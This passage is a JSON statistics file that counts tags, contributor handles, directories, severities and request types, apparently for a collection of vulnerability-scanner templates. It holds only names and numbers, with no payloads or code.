","count":1},{"name":"lg-nas","count":1},{"name":"cve2006","count":1},{"name":"codeigniter","count":1},{"name":"magicflow","count":1},{"name":"ewebs","count":1},{"name":"bullwark","count":1},{"name":"kyan","count":1},{"name":"tracer","count":1},{"name":"portainer","count":1},{"name":"visionhub","count":1},{"name":"uwsgi","count":1},{"name":"phpfastcache","count":1},{"name":"redcap","count":1},{"name":"weiphp","count":1},{"name":"tensorflow","count":1},{"name":"s3","count":1},{"name":"mailchimp","count":1},{"name":"flink","count":1},{"name":"natemail","count":1},{"name":"cyberoam","count":1},{"name":"websvn","count":1},{"name":"ssl","count":1},{"name":"gloo","count":1},{"name":"alerta","count":1},{"name":"rocketchat","count":1},{"name":"varnish","count":1},{"name":"frontpage","count":1},{"name":"metabase","count":1},{"name":"arl","count":1},{"name":"bitly","count":1},{"name":"ioncube","count":1},{"name":"netmask","count":1},{"name":"scimono","count":1},{"name":"primetek","count":1},{"name":"rsyncd","count":1},{"name":"maccmsv10","count":1},{"name":"eprints","count":1},{"name":"opencast","count":1},{"name":"cobub","count":1},{"name":"razor","count":1},{"name":"vcenter","count":1},{"name":"htmli","count":1},{"name":"zte","count":1},{"name":"plugin","count":1},{"name":"couchbase","count":1},{"name":"synnefo","count":1},{"name":"viewpoint","count":1},{"name":"trane","count":1},{"name":"jenkin","count":1},{"name":"woocommerce","count":1},{"name":"eyou","count":1},{"name":"duomicms","count":1},{"name":"nsasg","count":1},{"name":"blackboard","count":1},{"name":"redmine","count":1},{"name":"apiman","count":1},{"name":"openvpn","count":1},{"name":"chevereto","count":1},{"name":"circontrorl","count":1},{"name":"shopxo","count":1},{"name":"sar2html","count":1},{"name":"tpshop","count":1},{"name":"proftpd","count":1},{"name":"beanshell","count":1},{"name":"chinaunicom","count":1},{"name":"plc","count":1},{"name":"alibaba","count":1},{"name":"cors","count":1},{"name":"kafdrop","count":1},{"name":"tidb","count":1},{"name":"dotnet","count":1},{"name":"jaspersoft","count":1},{"name":"gsoap","count":1},{"name":"hiboss","count":1},{"name":"calendarix","count":1},{"name":"webmin","count":1},{"name":"phpwiki","count":1},{"name":"zookeeper","count":1},{"name":"webftp","count":1},{"name":"finereport","count":1},{"name":"keenetic","count":1},{"name":"cgi","count":1},{"name":"qdpm","count":1},{"name":"viewlinc","count":1},{"name":"acexy","count":1},{"name":"acontent","count":1},{"name":"lotus","count":1},{"name":"clave","count":1},{"name":"mara","count":1},{"name":"socomec","count":1},{"name":"idemia","count":1},{"name":"perl","count":1},{"name":"centreon","count":1},{"name":"okta","count":1},{"name":"b2evolution","count":1},{"name":"xdcms","count":1},{"name":"wavlink","count":1},{"name":"expose","count":1},{"name":"skywalking","count":1},{"name":"openerp","count":1},{"name":"fedora","count":1},{"name":"drone","count":1},{"name":"sgp","count":1},{"name":"werkzeug","count":1},{"name":"xvr","count":1},{"name":"erp-nc","count":1},{"name":"twitter-server","count":1},{"name":"episerver","count":1},{"name":"zcms","count":1},{"name":"soar","count":1},{"name":"mantisbt","count":1},{"name":"owasp","count":1},{"name":"craftcms","count":1},{"name":"clusterengine","count":1},{"name":"cocoon","count":1},{"name":"ghost","count":1},{"name":"huijietong","count":1},{"name":"avalanche","count":1},{"name":"netdata","count":1},{"name":"salesforce","count":1},{"name":"webmodule-ee","count":1},{"name":"olivetti","count":1},{"name":"smi","count":1},{"name":"ueditor","count":1},{"name":"svn","count":1},{"name":"rujjie","count":1},{"name":"gilacms","count":1},{"name":"terraform","count":1},{"name":"landrayoa","count":1},{"name":"openemr","count":1},{"name":"dvr","count":1},{"name":"vsphere","count":1},{"name":"redwood","count":1},{"name":"nps","count":1},{"name":"starttls","count":1},{"name":"livezilla","count":1},{"name":"bedita","count":1},{"name":"nc2","count":1},{"name":"mariadb","count":1},{"name":"expressjs","count":1},{"name":"blue-ocean","count":1},{"name":"daybyday","count":1},{"name":"burp","count":1},{"name":"rhymix","count":1},{"name":"graylog","count":1},{"name":"froxlor","count":1},{"name":"powercreator","count":1},{"name":"dbeaver","count":1},{"name":"openrestry","count":1},{"name":"office365","count":1},{"name":"openstack","count":1},{"name":"sourcebans","count":1},{"name":"yealink","count":1},{"name":"nordex","count":1},{"name":"comodo","count":1},{"name":"szhe","count":1},{"name":"darkstat","count":1},{"name":"bazarr","count":1},{"name":"default","count":1},{"name":"openx","count":1},{"name":"appweb","count":1},{"name":"myucms","count":1},{"name":"doh","count":1},{"name":"moinmoin","count":1},{"name":"moin","count":1},{"name":"nexusdb","count":1},{"name":"announcekit","count":1},{"name":"vidyo","count":1},{"name":"exponentcms","count":1},{"name":"vsftpd","count":1},{"name":"beanstalk","count":1},{"name":"webadmin","count":1},{"name":"lansweeper","count":1},{"name":"zm","count":1},{"name":"redis","count":1},{"name":"phalcon","count":1},{"name":"cloudinary","count":1},{"name":"smartsense","count":1},{"name":"ambari","count":1},{"name":"commax","count":1},{"name":"trilithic","count":1},{"name":"fortilogger","count":1},{"name":"xunchi","count":1},{"name":"anchorcms","count":1},{"name":"wazuh","count":1},{"name":"gateone","count":1},{"name":"rockethchat","count":1},{"name":"bigbluebutton","count":1},{"name":"geddy","count":1},{"name":"lutron","count":1},{"name":"linksys","count":1},{"name":"codemeter","count":1},{"name":"servicenow","count":1},{"name":"payara","count":1},{"name":"faraday","count":1},{"name":"rmi","count":1},{"name":"rdp","count":1},{"name":"bookstack","count":1},{"name":"vscode","count":1},{"name":"nuuo","count":1},{"name":"gotmls","count":1},{"name":"nette","count":1},{"name":"ulterius","count":1},{"name":"jfrog","count":1},{"name":"opm","count":1},{"name":"clink-office","count":1},{"name":"xmlchart","count":1},{"name":"sage","count":1},{"name":" default-login","count":1},{"name":"wondercms","count":1},{"name":"nedi","count":1},{"name":"subrion","count":1},{"name":"embedthis","count":1},{"name":"goahead","count":1},{"name":"feifeicms","count":1},{"name":"alertmanager","count":1},{"name":"cloudflare","count":1},{"name":"aura","count":1},{"name":"sql","count":1},{"name":"maxsite","count":1},{"name":"tieline","count":1},{"name":"circontrol","count":1},{"name":"logontracer","count":1},{"name":"karel","count":1},{"name":"hortonworks","count":1},{"name":"javamelody","count":1},{"name":"nifi","count":1},{"name":"acme","count":1},{"name":"jnoj","count":1}],"authors":[{"name":"pikpikcu","count":273},{"name":"dhiyaneshdk","count":258},{"name":"daffainfo","count":213},{"name":"pdteam","count":195},{"name":"geeknik","count":152},{"name":"dwisiswant0","count":131},{"name":"gy741","count":72},{"name":"pussycat0x","count":67},{"name":"madrobot","count":61},{"name":"princechaddha","count":61},{"name":"gaurang","count":42},{"name":"0x_akoko","count":39},{"name":"ice3man","count":26},{"name":"philippedelteil","count":25},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"random_robbie","count":10},{"name":"melbadry9","count":9},{"name":"nadino","count":9},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"harshbothra_","count":7},{"name":"0x240x23elu","count":7},{"name":"dr_set","count":7},{"name":"dogasantos","count":7},{"name":"oppsec","count":7},{"name":"meme-lord","count":7},{"name":"emadshanab","count":7},{"name":"kophjager007","count":7},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"logicalhunter","count":6},{"name":"pentest_swissky","count":6},{"name":"puzzlepeaches","count":6},{"name":"yanyun","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":5},{"name":"panch0r3d","count":5},{"name":"elsfa7110","count":5},{"name":"iamnoooob","count":5},{"name":"joanbono","count":5},{"name":"lu4nx","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"thomas_from_offensity","count":3},{"name":"vsh00t","count":3},{"name":"idealphase","count":3},{"name":"unstabl3","count":3},{"name":"impramodsargar","count":3},{"name":"fyoorer","count":3},{"name":"mavericknerd","count":3},{"name":"sushantkamble","count":3},{"name":"shifacyclewala","count":3},{"name":"shine","count":3},{"name":"z3bd","count":3},{"name":"tess","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"f1tz","count":3},{"name":"incogbyte","count":3},{"name":"_generic_human_","count":3},{"name":"jarijaas","count":3},{"name":"dudez","count":3},{"name":"johnk3r","count":3},{"name":"binaryfigments","count":3},{"name":"emenalf","count":3},{"name":"skeltavik","count":3},{"name":"mohammedsaneem","count":2},{"name":"hetroublemakr","count":2},{"name":"davidmckennirey","count":2},{"name":"kiblyn11","count":2},{"name":"0xelkomy","count":2},{"name":"bsysop","count":2},{"name":"ree4pwn","count":2},{"name":"swissky","count":2},{"name":"0xsapra","count":2},{"name":"alifathi-h1","count":2},{"name":"huowuzhao","count":2},{"name":"afaq","count":2},{"name":"random-robbie","count":2},{"name":"parth","count":2},{"name":"gal nagli","count":2},{"name":"bernardofsr","count":2},{"name":"vavkamil","count":2},{"name":"0xcrypto","count":2},{"name":"0xprial","count":2},{"name":"convisoappsec","count":2},{"name":"johnjhacking","count":2},{"name":"bing0o","count":2},{"name":"0xrudra","count":2},{"name":"zomsop82","count":2},{"name":"udit_thakkur","count":2},{"name":"socketz","count":2},{"name":"ehsahil","count":2},{"name":"g4l1t0","count":2},{"name":"dheerajmadhukar","count":2},{"name":"gevakun","count":2},{"name":"lotusdll","count":2},{"name":"amsda","count":2},{"name":"x1m_martijn","count":2},{"name":"pxmme1337","count":2},{"name":"foulenzer","count":2},{"name":"hahwul","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"whoever","count":2},{"name":"manas_harsh","count":2},{"name":"fabaff","count":2},{"name":"nkxxkn","count":2},{"name":"randomrobbie","count":2},{"name":"moritz nentwig","count":2},{"name":"cocxanh","count":2},{"name":"arcc","count":2},{"name":"w4cky_","count":2},{"name":"bp0lr","count":2},{"name":"joeldeleep","count":2},{"name":"0xsmiley","count":2},{"name":"koti2","count":2},{"name":"r3naissance","count":2},{"name":"_c0wb0y_","count":1},{"name":"d0rkerdevil","count":1},{"name":"izn0u","count":1},{"name":"0xrod","count":1},{"name":"jeya seelan","count":1},{"name":"fmunozs","count":1},{"name":"j33n1k4","count":1},{"name":"mhdsamx","count":1},{"name":"yavolo","count":1},{"name":"mesaglio","count":1},{"name":"ahmed sherif","count":1},{"name":"rojanrijal","count":1},{"name":"remonsec","count":1},{"name":"alph4byt3","count":1},{"name":"alex","count":1},{"name":"sy3omda","count":1},{"name":"pratik khalane","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"knassar702","count":1},{"name":"bolli95","count":1},{"name":"0ut0fb4nd","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"thevillagehacker","count":1},{"name":"iampritam","count":1},{"name":"c3l3si4n","count":1},{"name":"ohlinge","count":1},{"name":"mah3sec_","count":1},{"name":"exploitation","count":1},{"name":"mass0ma","count":1},{"name":"elder tao","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"0h1in9e","count":1},{"name":"@dwisiswant0","count":1},{"name":"toufik airane","count":1},{"name":"adrianmf","count":1},{"name":"kabirsuda","count":1},{"name":"affix","count":1},{"name":"andysvints","count":1},{"name":"ringo","count":1},{"name":"ajaysenr","count":1},{"name":"x6263","count":1},{"name":"sullo","count":1},{"name":"wabafet","count":1},{"name":"zandros0","count":1},{"name":"pdp","count":1},{"name":"ldionmarcil","count":1},{"name":"th3.d1p4k","count":1},{"name":"sicksec","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"b0rn2r00t","count":1},{"name":"sickwell","count":1},{"name":"aresx","count":1},{"name":"un-fmunozs","count":1},{"name":"flag007","count":1},{"name":"tim_koopmans","count":1},{"name":"mubassirpatel","count":1},{"name":"patralos","count":1},{"name":"divya_mudgal","count":1},{"name":"rodnt","count":1},{"name":"brabbit10","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"regala_","count":1},{"name":"notsoevilweasel","count":1},{"name":"0xteles","count":1},{"name":"rotemreiss","count":1},{"name":"jteles","count":1},{"name":"petruknisme","count":1},{"name":"nerrorsec","count":1},{"name":"luci","count":1},{"name":"pudsec","count":1},{"name":"_darrenmartyn","count":1},{"name":"alperenkesk","count":1},{"name":"bad5ect0r","count":1},{"name":"me9187","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"vzamanillo","count":1},{"name":"smaranchand","count":1},{"name":"s1r1u5_","count":1},{"name":"borna nematzadeh","count":1},{"name":"infosecsanyam","count":1},{"name":"philippdelteil","count":1},{"name":"ahmetpergamum","count":1},{"name":"undefl0w","count":1},{"name":"fopina","count":1},{"name":"omarkurt","count":1},{"name":"xstp","count":1},{"name":"52971","count":1},{"name":"willd96","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"taielab","count":1},{"name":"becivells","count":1},{"name":"hanlaomo","count":1},{"name":"bjhulst","count":1},{"name":"kareemse1im","count":1},{"name":"yashgoti","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"nytr0gen","count":1},{"name":"manuelbua","count":1},{"name":"defr0ggy","count":1},{"name":"whynotke","count":1},{"name":"shelld3v","count":1},{"name":"luskabol","count":1},{"name":"shreyapohekar","count":1},{"name":"cookiehanhoan","count":1},{"name":"thezakman","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"juicypotato1","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"naglinagli","count":1},{"name":"kurohost","count":1},{"name":"blckraven","count":1},{"name":"furkansenan","count":1},{"name":"apt-mirror","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"micha3lb3n","count":1},{"name":"0xtavian","count":1},{"name":"_harleo","count":1},{"name":"yashanand155","count":1},{"name":"b0yd","count":1},{"name":"zhenwarx","count":1},{"name":"push4d","count":1},{"name":"raesene","count":1},{"name":"schniggie","count":1},{"name":"andirrahmani1","count":1},{"name":"ipanda","count":1},{"name":"ilovebinbash","count":1},{"name":"deena","count":1},{"name":"qlkwej","count":1},{"name":"its0x08","count":1},{"name":"soyelmago","count":1},{"name":"sec_hawk","count":1},{"name":"hakluke","count":1},{"name":"intx0x80","count":1},{"name":"geraldino2","count":1},{"name":"absshax","count":1},{"name":"streetofhackerr007","count":1},{"name":"chron0x","count":1},{"name":"udyz","count":1},{"name":"berkdusunur","count":1},{"name":"b4uh0lz","count":1},{"name":"sshell","count":1},{"name":"co0nan","count":1},{"name":"noamrathaus","count":1},{"name":"gboddin","count":1},{"name":"ooooooo_q","count":1},{"name":"dawid-czarnecki","count":1},{"name":"elmahdi","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"revblock","count":1},{"name":"shifacyclewla","count":1},{"name":"kre80r","count":1},{"name":"akshansh","count":1},{"name":"retr0","count":1},{"name":"evolutionsec","count":1},{"name":"daviey","count":1},{"name":"tirtha_mandal","count":1},{"name":"akash.c","count":1},{"name":"makyotox","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1}],"directory":[{"name":"cves","count":725},{"name":"vulnerabilities","count":301},{"name":"exposed-panels","count":247},{"name":"technologies","count":191},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":36},{"name":"network","count":32},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":643},{"name":"high","count":553},{"name":"medium","count":448},{"name":"critical","count":273},{"name":"low","count":152}],"types":[{"name":"http","count":1965},{"name":"file","count":46},{"name":"network","count":41},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":731},{"name":"lfi","count":265},{"name":"panel","count":252},{"name":"xss","count":246},{"name":"exposure","count":233},{"name":"wordpress","count":229},{"name":"rce","count":199},{"name":"tech","count":183},{"name":"cve2020","count":164},{"name":"wp-plugin","count":155},{"name":"cve2021","count":130},{"name":"cve2019","count":96},{"name":"config","count":94},{"name":"cve2018","count":86},{"name":"joomla","count":79},{"name":"apache","count":70},{"name":"cve2010","count":69},{"name":"takeover","count":68},{"name":"iot","count":66},{"name":"token","count":65},{"name":"default-login","count":63},{"name":"oob","count":55},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":42},{"name":"sqli","count":38},{"name":"ssrf","count":38},{"name":"","count":37},{"name":"cve2016","count":36},{"name":"oracle","count":36},{"name":"redirect","count":33},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2015","count":24},{"name":"misc","count":23},{"name":"disclosure","count":22},{"name":"auth-bypass","count":21},{"name":"generic","count":21},{"name":"aem","count":19},{"name":"cve2014","count":19},{"name":"router","count":19},{"name":"cisco","count":19},{"name":"debug","count":18},{"name":"misconfig","count":18},{"name":"springboot","count":18},{"name":"sap","count":18},{"name":"php","count":16},{"name":"struts","count":14},{"name":"cve2011","count":14},{"name":"weblogic","count":14},{"name":"fuzz","count":14},{"name":"cve2012","count":14},{"name":"login","count":14},{"name":"devops","count":13},{"name":"adobe","count":13},{"name":"dns","count":13},{"name":"zoho","count":13},{"name":"android","count":13},{"name":"manageengine","count":12},{"name":"aws","count":12},{"name":"jenkins","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":11},{"name":"cve2013","count":11},{"name":"dell","count":10},{"name":"xxe","count":10},{"name":"ftp","count":9},{"name":"magento","count":9},{"name":"intrusive","count":9},{"name":"gitlab","count":8},{"name":"vmware","count":8},{"name":"scada","count":8},{"name":"ruijie","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"nginx","count":8},{"name":"rails","count":8},{"name":"files","count":7},{"name":"google","count":7},{"name":"coldfusion","count":7},{"name":"microsoft","count":7},{"name":"cve2009","count":7},{"name":"confluence","count":7},{"name":"ibm","count":7},{"name":"netgear","count":7},{"name":"kubernetes","count":7},{"name":"backup","count":7},{"name":"cms","count":7},{"name":"cve2008","count":6},{"name":"citrix","count":6},{"name":"jetty","count":6},{"name":"rconfig","count":6},{"name":"api","count":6},{"name":"docker","count":6},{"name":"solr","count":6},{"name":"camera","count":6},{"name":"django","count":6},{"name":"laravel","count":6},{"name":"drupal","count":5},{"name":"headless","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"java","count":5},{"name":"tomcat","count":5},{"name":"windows","count":5},{"name":"circarlife","count":5},{"name":"nodejs","count":5},{"name":"fileupload","count":5},{"name":"jolokia","count":5},{"name":"printer","count":5},{"name":"deserialization","count":5},{"name":"hp","count":5},{"name":"dedecms","count":5},{"name":"lucee","count":5},{"name":"phpmyadmin","count":5},{"name":"vpn","count":4},{"name":"exchange","count":4},{"name":"git","count":4},{"name":"magmi","count":4},{"name":"thinkphp","count":4},{"name":"samsung","count":4},{"name":"proxy","count":4},{"name":"zabbix","count":4},{"name":"firmware","count":4},{"name":"zimbra","count":4},{"name":"solarwinds","count":4},{"name":"symantec","count":4},{"name":"artifactory","count":4},{"name":"symfony","count":4},{"name":"moodle","count":4},{"name":"webserver","count":4},{"name":"glpi","count":4},{"name":"crlf","count":4},{"name":"grafana","count":4},{"name":"thinkcmf","count":4},{"name":"elastic","count":4},{"name":"strapi","count":4},{"name":"hongdian","count":4},{"name":"traversal","count":4},{"name":"buffalo","count":4},{"name":"resin","count":4},{"name":"wso2","count":4},{"name":"asp","count":4},{"name":"rfi","count":4},{"name":"kibana","count":3},{"name":"openssh","count":3},{"name":"kevinlab","count":3},{"name":"ssh","count":3},{"name":"vbulletin","count":3},{"name":"httpd","count":3},{"name":"zhiyuan","count":3},{"name":"microstrategy","count":3},{"name":"nexus","count":3},{"name":"amazon","count":3},{"name":"slack","count":3},{"name":"mail","count":3},{"name":"jeesns","count":3},{"name":"oa","count":3},{"name":"caucho","count":3},{"name":"fanruan","count":3},{"name":"npm","count":3},{"name":"fpd","count":3},{"name":"backups","count":3},{"name":"jellyfin","count":3},{"name":"tikiwiki","count":3},{"name":"lfr","count":3},{"name":"hoteldruid","count":3},{"name":"druid","count":3},{"name":"springcloud","count":3},{"name":"opensis","count":3},{"name":"mongodb","count":3},{"name":"terramaster","count":3},{"name":"nacos","count":3},{"name":"itop","count":3},{"name":"r-seenet","count":3},{"name":"targa","count":3},{"name":"ofbiz","count":3},{"name":"log","count":3},{"name":"kafka","count":3},{"name":"ebs","count":3},{"name":"telerik","count":3},{"name":"bigip","count":3},{"name":"cacti","count":3},{"name":"firebase","count":3},{"name":"linkerd","count":3},{"name":"injection","count":3},{"name":"openam","count":3},{"name":"bitrix","count":3},{"name":"prometheus","count":3},{"name":"smtp","count":3},{"name":"nosqli","count":3},{"name":"enumeration","count":2},{"name":"dolibarr","count":2},{"name":"geowebserver","count":2},{"name":"glassfish","count":2},{"name":"waf","count":2},{"name":"flir","count":2},{"name":"ecology","count":2},{"name":"kong","count":2},{"name":"bypass","count":2},{"name":"chamilo","count":2},{"name":"cache","count":2},{"name":"hostheader-injection","count":2},{"name":"openvpn","count":2},{"name":"icewarp","count":2},{"name":"shellshock","count":2},{"name":"cve2005","count":2},{"name":"trixbox","count":2},{"name":"axis","count":2},{"name":"horde","count":2},{"name":"openfire","count":2},{"name":"nagios","count":2},{"name":"huawei","count":2},{"name":"mcafee","count":2},{"name":"prestashop","count":2},{"name":"sharepoint","count":2},{"name":"qcubed","count":2},{"name":"rockmongo","count":2},{"name":"service","count":2},{"name":"axis2","count":2},{"name":"activemq","count":2},{"name":"jboss","count":2},{"name":"mida","count":2},{"name":"idrac","count":2},{"name":"wuzhicms","count":2},{"name":"cve2007","count":2},{"name":"phpcollab","count":2},{"name":"grav","count":2},{"name":"github","count":2},{"name":"nextjs","count":2},{"name":"couchdb","count":2},{"name":"node","count":2},{"name":"natshell","count":2},{"name":"avantfax","count":2},{"name":"sonicwall","count":2},{"name":"backdoor","count":2},{"name":"sitecore","count":2},{"name":"status","count":2},{"name":"db","count":2},{"name":"adminer","count":2},{"name":"plesk","count":2},{"name":"leak","count":2},{"name":"minio","count":2},{"name":"yapi","count":2},{"name":"rstudio","count":2},{"name":"nextcloud","count":2},{"name":"prtg","count":2},{"name":"akkadian","count":2},{"name":"sonarqube","count":2},{"name":"aruba","count":2},{"name":"jeedom","count":2},{"name":"oauth","count":2},{"name":"ilo","count":2},{"name":"seeyon","count":2},{"name":"commax","count":2},{"name":"splunk","count":2},{"name":"storage","count":2},{"name":"fortios","count":2},{"name":"favicon","count":2},{"name":"frp","count":2},{"name":"bucket","count":2},{"name":"hpe","count":2},{"name":"bruteforce","count":2},{"name":"getsimple","count":2},{"name":"igs","count":2},{"name":"dos","count":2},{"name":"linux","count":2},{"name":"yii","count":2},{"name":"ucmdb","count":2},{"name":"odoo","count":2},{"name":"liferay","count":2},{"name":"xxljob","count":2},{"name":"vrealize","count":2},{"name":"akamai","count":2},{"name":"guacamole","count":2},{"name":"jsf","count":2},{"name":"maian","count":2},{"name":"totemomail","count":2},{"name":"smb","count":2},{"name":"showdoc","count":2},{"name":"hashicorp","count":2},{"name":"chiyu","count":2},{"name":"netis","count":2},{"name":"pega","count":2},{"name":"emerge","count":2},{"name":"harbor","count":2},{"name":"webcam","count":2},{"name":"voipmonitor","count":2},{"name":"kentico","count":2},{"name":"hjtcloud","count":2},{"name":"netsweeper","count":2},{"name":"ec2","count":2},{"name":"spark","count":2},{"name":"saltstack","count":2},{"name":"paloalto","count":2},{"name":"middleware","count":2},{"name":"hasura","count":2},{"name":"azure","count":2},{"name":"keycloak","count":2},{"name":"ecoa","count":2},{"name":"globalprotect","count":2},{"name":"wordfence","count":2},{"name":"apos","count":1},{"name":"sgp","count":1},{"name":"oneblog","count":1},{"name":"exposures","count":1},{"name":"expressjs","count":1},{"name":"feifeicms","count":1},{"name":"clickhouse","count":1},{"name":"tidb","count":1},{"name":"chyrp","count":1},{"name":"mautic","count":1},{"name":"nimble","count":1},{"name":"realteo","count":1},{"name":"parentlink","count":1},{"name":"metinfo","count":1},{"name":"sureline","count":1},{"name":"pmb","count":1},{"name":"pulsesecure","count":1},{"name":"zookeeper","count":1},{"name":"imap","count":1},{"name":" default-login","count":1},{"name":"jnoj","count":1},{"name":"smartblog","count":1},{"name":"rujjie","count":1},{"name":"tpshop","count":1},{"name":"episerver","count":1},{"name":"lanproxy","count":1},{"name":"ricoh","count":1},{"name":"duomicms","count":1},{"name":"k8s","count":1},{"name":"actuator","count":1},{"name":"servicedesk","count":1},{"name":"tieline","count":1},{"name":"graphql","count":1},{"name":"emby","count":1},{"name":"razor","count":1},{"name":"seacms","count":1},{"name":"whm","count":1},{"name":"livezilla","count":1},{"name":"fuelcms","count":1},{"name":"ruby","count":1},{"name":"totaljs","count":1},{"name":"huijietong","count":1},{"name":"cofax","count":1},{"name":"lansweeper","count":1},{"name":"webmin","count":1},{"name":"openemr","count":1},{"name":"weiphp","count":1},{"name":"rmi","count":1},{"name":"goahead","count":1},{"name":"grails","count":1},{"name":"owasp","count":1},{"name":"daybyday","count":1},{"name":"crm","count":1},{"name":"starttls","count":1},{"name":"shoppable","count":1},{"name":"appweb","count":1},{"name":"testrail","count":1},{"name":"mailchimp","count":1},{"name":"pyramid","count":1},{"name":"eyelock","count":1},{"name":"centreon","count":1},{"name":"nifi","count":1},{"name":"postmessage","count":1},{"name":"darkstat","count":1},{"name":"vnc","count":1},{"name":"proftpd","count":1},{"name":"rockethchat","count":1},{"name":"spring","count":1},{"name":"geutebruck","count":1},{"name":"gsoap","count":1},{"name":"magicflow","count":1},{"name":"powercreator","count":1},{"name":"xdcms","count":1},{"name":"shopxo","count":1},{"name":"minimouse","count":1},{"name":"servicenow","count":1},{"name":"discourse","count":1},{"name":"xml","count":1},{"name":"jaspersoft","count":1},{"name":"jmx","count":1},{"name":"ssltls","count":1},{"name":"pcoip","count":1},{"name":"sprintful","count":1},{"name":"cors","count":1},{"name":"expose","count":1},{"name":"listserv","count":1},{"name":"spectracom","count":1},{"name":"elasticsearch","count":1},{"name":"rmc","count":1},{"name":"cse","count":1},{"name":"myvuehelp","count":1},{"name":"selea","count":1},{"name":"upnp","count":1},{"name":"k8","count":1},{"name":"nweb2fax","count":1},{"name":"faraday","count":1},{"name":"skywalking","count":1},{"name":"lotuscms","count":1},{"name":"zcms","count":1},{"name":"nsasg","count":1},{"name":"dom","count":1},{"name":"motorola","count":1},{"name":"acontent","count":1},{"name":"openerp","count":1},{"name":"avtech","count":1},{"name":"opm","count":1},{"name":"mrtg","count":1},{"name":"javafaces","count":1},{"name":"sage","count":1},{"name":"gotmls","count":1},{"name":"ns","count":1},{"name":"cscart","count":1},{"name":"blackboard","count":1},{"name":"owa","count":1},{"name":"tor","count":1},{"name":"emc","count":1},{"name":"sangfor","count":1},{"name":"clockwatch","count":1},{"name":"bash","count":1},{"name":"rabbitmq","count":1},{"name":"bazarr","count":1},{"name":"spf","count":1},{"name":"dotclear","count":1},{"name":"cyberoam","count":1},{"name":"subrion","count":1},{"name":"mantisbt","count":1},{"name":"cloudinary","count":1},{"name":"geddy","count":1},{"name":"metabase","count":1},{"name":"gateone","count":1},{"name":"sentry","count":1},{"name":"pippoint","count":1},{"name":"portainer","count":1},{"name":"hiawatha","count":1},{"name":"natemail","count":1},{"name":"trane","count":1},{"name":"hadoop","count":1},{"name":"floc","count":1},{"name":"bigbluebutton","count":1},{"name":"octoprint","count":1},{"name":"wavlink","count":1},{"name":"netdata","count":1},{"name":"doh","count":1},{"name":"beanshell","count":1},{"name":"eprints","count":1},{"name":"xmlchart","count":1},{"name":"lancom","count":1},{"name":"avalanche","count":1},{"name":"arl","count":1},{"name":"mongoshake","count":1},{"name":"email","count":1},{"name":"wildfly","count":1},{"name":"olivetti","count":1},{"name":"smartsense","count":1},{"name":"tongda","count":1},{"name":"qsan","count":1},{"name":"dvr","count":1},{"name":"nexusdb","count":1},{"name":"fortigate","count":1},{"name":"tcexam","count":1},{"name":"exponentcms","count":1},{"name":"landrayoa","count":1},{"name":"redhat","count":1},{"name":"webmodule-ee","count":1},{"name":"database","count":1},{"name":"kafdrop","count":1},{"name":"cve2006","count":1},{"name":"moin","count":1},{"name":"bullwark","count":1},{"name":"trilithic","count":1},{"name":"rsyncd","count":1},{"name":"wooyun","count":1},{"name":"asus","count":1},{"name":"jeewms","count":1},{"name":"wing-ftp","count":1},{"name":"zarafa","count":1},{"name":"krweb","count":1},{"name":"nordex","count":1},{"name":"zms","count":1},{"name":"dotnet","count":1},{"name":"azkaban","count":1},{"name":"svnserve","count":1},{"name":"haproxy","count":1},{"name":"openrestry","count":1},{"name":"pihole","count":1},{"name":"cloudflare","count":1},{"name":"sar2html","count":1},{"name":"oscommerce","count":1},{"name":"fortinet","count":1},{"name":"plugin","count":1},{"name":"h3c-imc","count":1},{"name":"sarg","count":1},{"name":"lutron","count":1},{"name":"cgi","count":1},{"name":"opensns","count":1},{"name":"solman","count":1},{"name":"webui","count":1},{"name":"spip","count":1},{"name":"fastapi","count":1},{"name":"jenkin","count":1},{"name":"tika","count":1},{"name":"office365","count":1},{"name":"gloo","count":1},{"name":"karel","count":1},{"name":"alibaba","count":1},{"name":"auth","count":1},{"name":"yealink","count":1},{"name":"etherpad","count":1},{"name":"saltapi","count":1},{"name":"heroku","count":1},{"name":"bookstack","count":1},{"name":"redmine","count":1},{"name":"apiman","count":1},{"name":"tracer","count":1},{"name":"tileserver","count":1},{"name":"embedthis","count":1},{"name":"sceditor","count":1},{"name":"javascript","c